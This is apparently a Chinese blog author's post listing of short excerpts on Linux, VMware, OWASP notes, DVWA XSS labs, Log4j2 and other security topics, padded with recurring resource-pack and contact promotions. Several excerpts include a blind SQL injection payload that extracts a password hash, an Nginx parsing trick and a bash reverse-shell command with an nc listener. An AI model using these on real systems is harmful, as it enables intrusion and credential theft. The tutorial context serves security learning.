- 博客(704)
- 收藏
- 关注
RSS订阅原创 VMware安装Metasploitable2的过程解析_metasploitable-linux-2
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。
2024-04-18 12:59:18
513
原创 vmWare安装centos7, 设置虚拟网络编辑器VMnet8时不生效问题,连接finalshell不好使?
如过遇到配置好了 点击确定 一直在转圈,之后配置不生效。要是还没好,那就请出大杀器CCleaner直接一键清理注册表,这个软件可自行下载也可我提供了baidu。选择VMnet8 net模式 自己写好子网ip()——>net设置(绿色)第二个图,可以自己写 但是网段的对上,然后确定就可以了。打开配置文件 修改参数 自己配置ip 这样就会固定死了 不会连接网络不同ip不同了。查看一下 修改完保存上没 在之后登录就可以 sudo -i 切换 root。友,可以添加V获取:vip1024b (备注运维)**
2024-04-18 12:58:47
445
原创 shell脚本读取配置文件_shell脚本获取数据库表中的配置
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
2024-04-18 09:15:29
574
原创 shell脚本打印乘法口诀实战演示_liusong04目录下,使用shell script 程序实现乘法口诀表,并打印结果
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
2024-04-18 09:14:58
365
原创 OWASP_top_10漏洞的总结笔记_server leaks version information via ";server"; http
uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123,123 的时候页面是正确的,现在再盲猜 hash 的第一位,如果第一位等于 0x42 也就是 B,那么strcmp结果为0,0+123=123,所以页面应该是正确的。那么可以构造这样的注入语句:?描述:目前Nginx 主要有这两种漏洞,一个是对任意文件名,在后面添加/abc.php 的解析漏洞,如原本文件名是test.jpg则可以添加为test.jpg/x.php进行解析攻击。
2024-04-18 05:39:17
776
原创 OWASP 之最常见的安全漏洞,2024年最新4面字节跳动拿到Offer
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂
2024-04-18 05:38:47
493
原创 Liunx中禁止普通用户切换root的解决方法,2024年最新零基础学习网络安全编程
通过限制普通用户访问root用户的能力,你可以防止用户误操作,或者防止如果用户的账户被攻击或病毒感染时对系统造成的全面破坏。对于限制爆破root密码的尝试特别有用,同时对于多用户环境、服务器或者安全性需求较高的环境尤其重要。#这行设置的含义是:在进行身份验证时,必须通过pam_wheel.so模块,即只有wheel组中的用户才能使用su命令切换成root用户。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
2024-04-18 01:54:24
812
原创 Liunx中禁止普通用户切换root的解决方法(1),关于网络安全程序员最近的状况
通过限制普通用户访问root用户的能力,你可以防止用户误操作,或者防止如果用户的账户被攻击或病毒感染时对系统造成的全面破坏。对于限制爆破root密码的尝试特别有用,同时对于多用户环境、服务器或者安全性需求较高的环境尤其重要。#这行设置的含义是:在进行身份验证时,必须通过pam_wheel.so模块,即只有wheel组中的用户才能使用su命令切换成root用户。鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
2024-04-18 01:53:54
446
原创 Linux基础中的基础02 基础命令篇(1),Linux运维的Io模型你了解多少
输入正确的查找命令后,运行后会出现符合要求的结果,信息包含要查找内容的绝对路径(绝对路径的概念在上一篇已做详细介绍)修改前权限为-rw-rw-r–,执行chmod 777 aaa 语句后,修改后权限为-rexrwxrwx。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?三个m分别表示自己的权限、同组除自己外用户的权限、其他用户的权限。m=r(4)+w(2)+x(1)【m的数值范围0-7】
2024-04-17 22:26:11
999
原创 linux基础、shell、绝对相对路径_shell相对路径和绝对路径
linux一切皆文件(文件夹、文件)bin:存放二进制文件(命令)普通用户dev:存放硬件(硬盘)home:家目录的上级目录,root用户例外,他的家目录在根下的root(/root)家目录作用:存放用户 个性化配置文件的文件夹lib64:代码库 libnet:网络proc:进程有关,正在运行的程序run:加载到内存中的文件boot:系统启动需要的文件etc:配置文件 用户信息 密码信息 挂载 yummnt:空的 专门用来挂载opt:第三方软件sbin:管理员可以使用的命令。
2024-04-17 22:25:41
661
原创 Linux -bash !“ event not found 问题解决_-bash ! event not found
【代码】Linux -bash!“ event not found 问题解决_-bash!
2024-04-17 17:48:08
838
原创 Linux -bash !“ event not found 问题解决_-bash ! event not found(2)
的话,Shell 会以为要执行历史展开,从而导致报错。,如果不知道啥意思的话,可以戳。1、关闭 histexpand。命令行下,双引号里面用了。
2024-04-17 17:47:38
682
原创 Java中List集合有哪些特性?(内含视频教程)_list体系共有的特性方式(1)
/ 数组转List的方式一:List.of()返回一个只读的集合,不能进行add/remove等修改操作。System.out.println(“方式一,value=”+val);//创建ArrayList集合,中的是泛型,后面我们会专门讲解泛型。//创建ArrayList集合,中的是泛型,后面我们会专门讲解泛型。//创建ArrayList集合,中的是泛型,后面我们会专门讲解泛型。names.add(“一一哥”);names.add(“一一哥”);names.add(“一一哥”);
2024-04-17 14:18:30
544
原创 JavaWeb~用饿汉模式、懒汉模式(高性能线程安全版)分别实现单例模式(3)
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
2024-04-17 14:17:28
536
原创 DVWA-XXS(Reflected),2024年最新薪资翻倍
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~(img-hGX7ooHv-1713321582702)]str_replace函数:替换字符串的内容,把内容中。没有任何防御直接运行搜索框里面的内容。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。可以看到代码插入程序中。
2024-04-17 10:40:00
381
原创 DVWA-XSS(DOM)Low Medium High低中高级别_就tm你叫韩毅啊
XSS(DOM)关卡是一个选项卡功能,我们在选项卡中选择一种语言,点击 「Select」 按钮,网站就会使用Get请求,将地址栏中 default 参数的值提交到后台,处理后在选项卡处回显。地址栏中 default 参数的值可以修改,这是本关的突破口,我们直接在地址栏把 default 的值修改为 text,修改的参数值会插入到页面中,如果插入可执行代码,就能在页面中执行。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
2024-04-17 10:39:30
743
原创 ChatGPT3,2024年最新读完我这份《网络安全开发核心源码精编解析》面试至少多要3K
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!因篇幅有限,仅展示部分资料。
2024-04-17 06:57:25
405
原创 ChatGPT3(1),2024年最新0基础学网络安全
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
2024-04-17 06:56:54
367
原创 33,2024最新Linux运维面试题目解答
- ”号: 邮件的信息比较多,现将数据存储到内存,达到一定大小,全部写到硬盘.有利于减少 I/O 进程的开销。#将新规则追加于尾部入站请求 ens33 网卡,地址是 192.168.1.63 的 IP,被丢弃。方法 2: rm -rf /var/log/btmp && touch /var/log/btmp。,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。/var/log/wtmp 也是一个二进制文件,记录每个用户的登录次数和持续时间等信息。
2024-04-17 03:12:41
569
原创 31-2 文件包含及流量分析,2024年最新阿里程序员的网络安全之路
目录遍历漏洞(Directory Traversal Vulnerability)是一种常见的web安全漏洞,产生的主要原因在于在web应用的功能设计中,没有对用户输入的文件名或路径进行严格的安全验证和过滤。通常情况下,用户的请求会通过URL参数的形式传递给后台服务器,后台根据该参数的数值来执行对应的文件操作,如果没有对用户输入的值做出限制,攻击者可以利用类似"…/"的路径遍历字符串来访问服务器上其他目录的文件。
2024-04-17 03:12:10
704
原创 网络安全快速入门 dos介绍及常用的dos指令(小白轻喷)(1)
ps:本机地址中最后一个十进制数字即为服务器端口号,同样,外机地址中最后一个十进制数字即为外机服务器端口号,计算机通过端口进行连接,因此需要端口号来进行区分。-n:以数字来端口号。如果不加-n选项,那么命令会进行端口号的反解,这个过程非常慢,因此会导致命 令执行慢。**例如:**当前在C:\intel\logs目录下操作,那么这个目录就是工作目录(如下图)**作用:**查看当前工作目录下的全部文件,包括文件和目录都会显示出来(如下图)**方法二:**先进入到pte的目录下,然后直接进行创建。
2024-04-16 20:27:46
516
原创 网络安全必备:Kali 中扫描器和爆破工具的选用与实践_kali扫描网段
口令(密码)就相当于进入家门的钥匙,当他人有一把可以进入你家的钥匙,想想你的安全、你的财务、你的隐私、害怕了吧。**1)**让两台虚拟机能互相通信(可以使用ping命令测试)如:windows server2003的IP配置成:10.1.1.1/24,windowsXP的IP配置成:10.1.1.2/24,然后把两台虚拟就桥接到同一个虚拟网络就行了。**目的:**是建立可靠的通信通道,说到通信,简单来说就是数据的发生与接收,而三次握手最主要的目的就是双方确认自己与对方的发送与接收是否正常。
2024-04-16 20:27:15
816
原创 物联网,工业行业资产收集关键字(1),阿里巴巴二面被血虐
递佳-供应链管理物联网云平台(D-Plus) | 重庆市农业气象物联网公共服务平台 || 中国铁塔物联网平台-China-Tower | 绵阳市物联网应用公共服务平台 || 速达荣耀3000-PRO工业版 | 模模搭-|-物联网3D可视化应用平台 || 映物云工业物联网数字化平台 | 福建农业物联网技术创新公共服务平台 || 三星ARTIK物联网(IoT)平台 | 讯方-物联网云服务开发平台 || 数据采集-工业物联网大数据平台 | 99DNA国家物联网公共平台 |
2024-04-16 16:50:56
411
原创 物联网VPDN能源组网解决方案_cat1如何做vpdn的功能,2024年最新金三银四我带你去BAT面试现场
总而言之,物联网卡在能源管理数智化进程中起着关键作用,不仅为用户提供了远程网络连接和数据传输功能,使得能源设备可以实现远程监控、控制和优化,同时还为设备提供一个智能化的“大脑”,对设备环境和能源消耗进行实时精确感知,并让整个能源管理系统更加数智化,帮助用户提高能源效率,降低能源成本,推动可持续能源和智慧能源的发展。物联网卡提供了可靠的数据传输通道,使能源管理系统能采集实时的能源开采、运输、使用等数据并发送到云平台进行分析和处理,并通过相应算法对能源使用模式进行分析和预测,帮助制定更有效的能源管理策略。
2024-04-16 16:50:25
384
原创 开源之光:Llama模型如何重新定义人工智能技术的未来(1)
当更多的人能够接触和利用这些先进的技术时,他们也开始思考如何以负责任的方式使用人工智能,以及如何解决可能产生的社会、法律和道德问题。它不仅加速了技术的创新和应用,也促进了行业的竞争和合作,同时激发了对AI发展更广泛社会影响的思考。Llama的开源为市场上的公司提供了一个共同的起点,这意味着小公司和初创企业也能够基于这一模型开发出具有竞争力的产品和服务。随着更多的公司和开发者基于Llama进行开发,共同面临的挑战和问题促进了行业内部的沟通和协作。7、Tomcat和Resin有什么区别,工作中你怎么选择?
2024-04-16 12:59:00
556
原创 开源一套直播平台,2024年最新网络安全开发不得不会
RTMP/RTSP/HLS/STR/HDS/DASH/HTTPFLV/WebSocketFLV/GB28181/WebSocketTS/HTTPTS/HTTPFMP4/WebSocketFMP4/WebRTC/MP4/NDI,支持多种协议,支持协议互转。直播流录制,直播流回放,直播流下载,企业微信群机器人对接。使用多路复用/多线程/异步网络IO模式开发,并发性能优越,支持海量客户端连接。支持画面秒开,极低带宽、极低延时(500毫秒内,最低可达100毫秒)。
2024-04-16 12:58:30
1005
原创 在 Linux 系统中安装并设置 kubectl_linux环境,kubectl安装(2)
要升级 kubectl 到别的次要版本,你需要先升级 /etc/apt/sources.list.d/kubernetes.list 中的版本, 再运行 apt-get update 和 apt-get upgrade。两种方式的效果相同。如果你想使用 v1.29 之外的 Kubernetes 版本, 将下面命令中的 v1.29 替换为所需的次要版本。例如,如果你想在自己的笔记本上(本地)运行 Kubernetes 集群,你需要先安装一个 Minikube 这样的工具,然后再重新运行上面的命令。
2024-04-16 09:11:03
491
原创 在 Linux 系统中安装并设置 kubectl_linux环境,kubectl安装(1)
要升级 kubectl 到别的次要版本,你需要先升级 /etc/apt/sources.list.d/kubernetes.list 中的版本, 再运行 apt-get update 和 apt-get upgrade。如果你想使用 v1.29 之外的 Kubernetes 版本, 将下面命令中的 v1.29 替换为所需的次要版本。例如,如果你想在自己的笔记本上(本地)运行 Kubernetes 集群,你需要先安装一个 Minikube 这样的工具,然后再重新运行上面的命令。
2024-04-16 09:10:32
330
原创 什么是 DevOps?看这一篇就够了!,2024年最新初面蚂蚁金服
Atlassion 有一篇题为DevOps的文章,里面有这样一句话:DevOps 是一系列实践工具和一个融合开发及 IT 团队的文化理念。DevOps 强调赋能团队、跨团队沟通与协作以及技术自动化。DevOps = 工具 + 实践 + 文化Atlassian 还提到一个 DevOps 团队包含了开发和 IT 运维,大家一起协作,共同参与产品的整个生命周期,一起为提升软件质量和加速软件开发过程而努力。
2024-04-16 05:10:32
564
原创 什么情况,听说网络安全工程师已经没落?_网络工程师现在废了
前面Web安全相关的攻击都是一些很多年的经典手法了,经过多年的发展已经相当成熟,相关的漏洞早已不如以前多,现在很多时候的攻击,都是依靠各种各样的第三方组件漏洞完成的,所以学习研究这些常见第三方组件的漏洞,一方面掌握这些攻击手法用于实战中使用,另一方面触类旁通,对从事漏洞挖掘的工作也是非常有帮助的。度过了石器时代,你已经储备了一些计算机的基础知识:操作系统的使用,网络协议,前端基础,数据库初识,但这距离做网络安全还不够,在第二个青铜阶段,你还需要再进一步学习基础,在第一阶段之上,难度会开始慢慢上升。
2024-04-16 05:10:00
762
原创 『CVE』简析CVE-2024-48795 SSH协议前缀截断攻击(Terrapin攻击)
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
2024-04-15 23:11:49
803
原创 《鸿蒙理论知识03》HarmonyOS概述之系统安全,网络安全码农是如何进入腾讯的
正确的 人”是确保用户数据不被非法访问、用户隐私不泄露的前提条件。协同互助认证:HarmonyOS 通过将硬件和认证能力解耦(即信息采集和认证可以在 不同的设备上完成),来实现不同设备的资源池化以及能力的互助与共享,让高安全等级的设备协助低安全等级的设备完成用户身份认证。正确的设备 在分布式终端场景下,只有保证用户使用的设备是安全可靠的,才能保证用户数据在虚拟终 端上得到有效保护,避免用户隐私泄露。在搭载 HarmonyOS 的分布式终端上,可以保证“正确的人,通过正确的设备,正确地使 用数据”。
2024-04-15 23:08:41
609
原创 《鸿蒙理论知识03》HarmonyOS概述之系统安全(4),又到一年金三银四
协同互助认证:HarmonyOS 通过将硬件和认证能力解耦(即信息采集和认证可以在 不同的设备上完成),来实现不同设备的资源池化以及能力的互助与共享,让高安全等级的设备协助低安全等级的设备完成用户身份认证。正确的设备 在分布式终端场景下,只有保证用户使用的设备是安全可靠的,才能保证用户数据在虚拟终 端上得到有效保护,避免用户隐私泄露。在搭载 HarmonyOS 的分布式终端上,可以保证“正确的人,通过正确的设备,正确地使 用数据”。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
2024-04-15 23:08:10
874
原创 《鸿蒙理论知识03》HarmonyOS概述之系统安全(1),大厂offer手到擒来
协同互助认证:HarmonyOS 通过将硬件和认证能力解耦(即信息采集和认证可以在 不同的设备上完成),来实现不同设备的资源池化以及能力的互助与共享,让高安全等级的设备协助低安全等级的设备完成用户身份认证。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在搭载 HarmonyOS 的分布式终端上,可以保证“正确的人,通过正确的设备,正确地使 用数据”。
2024-04-15 23:07:07
1018
原创 《红蓝攻防对抗实战》七,2024年最新纯干货
2)在目标服务器中执行bash -c "bash -i >& /dev/tcp/192.168.0.2/8888 0>&1命令来将shell反弹到攻击机上,其中192.168.0.2是攻击机的IP地址,8888是所监听的端口,如图1-5所示。2)开启目标服务器的监听后,在攻击机执行nc 192.168.0.3 8888命令来连接目标服务器,此时会获得到目标服务器反弹出来的shell,使用ifconfig命令来验证是否是目标服务器的IP地址,执行结果如图1-3所示。15、讲述一下LVS三种模式的工作过程?
2024-04-15 23:06:36
877
原创 《生物识别技术:面对安全挑战的绝佳选择?》,2024年最新网络安全高级面试题
综上所述,尽管生物识别技术具有许多优势,但也面临着诸多局限性和挑战,如隐私问题、技术可靠性、成本和设备要求、法律法规限制以及社会接受度等。在推广和应用生物识别技术的过程中,需要充分考虑这些局限性,并采取相应的措施来解决和应对,以确保生物识别技术的安全、可靠和可持续发展。生物识别技术是一种利用个体独特的生物特征进行身份验证和识别的技术。因此,生物识别技术作为一种安全措施具有诸多优势,包括独特性、不可丢失性、便捷性、高安全性、抗攻击性和广泛适用性等,使其成为当前安全领域中备受青睐的一种身份验证手段。
2024-04-15 23:05:33
502
原创 《生物识别技术:面对安全挑战的绝佳选择?》(2),2024大厂网络安全高级面试题及答案
生物识别技术是一种利用个体独特的生理特征或行为特征进行身份验证和识别的技术。与传统的身份验证方式(如密码、身份证)相比,生物识别技术更加安全、便捷和准确,因为每个人的生物特征都是独一无二的,难以被冒用或伪造。指纹识别是利用个体手指上的皮肤纹路图案进行识别的技术。指纹识别系统通过扫描、提取和比对指纹图像来验证个体的身份,其准确性和可靠性较高。虹膜识别是利用眼睛虹膜的纹理和颜色进行识别的技术。虹膜识别系统使用摄像头获取个体眼睛的虹膜图像,然后通过比对存储在数据库中的虹膜特征来验证身份。
2024-04-15 23:05:02
685
原创 《物联网安全技术》期末复习总结_物联网安全技术期末,2024年最新Jetpack-MVVM-高频提问和解答
②MAC不影响明文的读取,可以一直附在明文后面,在需要的时候灵活认证,可以延长对消息的保护时间,而不仅仅是在传输的时候。(1)ECB: 明文消息被分成固定大小的块(分组),并且每个块被单独加密,所以每个块的加密和解密都是独立的,且使用相同的方法进行加密,可以进行并行计算。是指物联网环境下的网络安全,是指物联网系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,物联网系统连续可靠正常地运行,网络服务不中断。(2)然后,根据密钥字节的数量,确定需要扩展的轮数。
2024-04-15 23:03:59
639
原创 《漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
LDAP 目录服务是由目录数据库和一套访问协议组成的系统,目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,我们可以理解为是一个为可以查询、浏览和搜索而优化的分布式数据库,它呈树状结构组织数据,简单点理解:就是有一个类似于字典的数据源,可以通过LDAP协议,lookup查询传一个name进去,就能获取到数据。RMI是Java中的一种远程方法调用机制,使用RMI,可以在不同的Java虚拟机(JVM)之间进行对象之间的方法调用。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
2024-04-15 23:03:29
1201
原创 《漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞(1)
目录系统可以用来存储和查找与对象相关的元数据信息,不仅提供命名到对象的映射,还提供对象的属性信息,方便管理和检索,并提供对象属性操作执行的功能,总体来说,目录服务是名称服务的扩展,它提供了更丰富的元数据信息,提高了对象的管理和检索能力。不同的数据源有不同的查找方式,而且JNDI也只是一个上层封装,在它下面有很多种具体的数据源,如LDAP,DNS,NIS,NDS,RMI。,它类似于字典,即输入name查询对象包含的属性,所以JNDI支持命名引用的方式,可以远程下载一个class文件,然后加载起来构建对象。
2024-04-15 23:02:57
1092
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人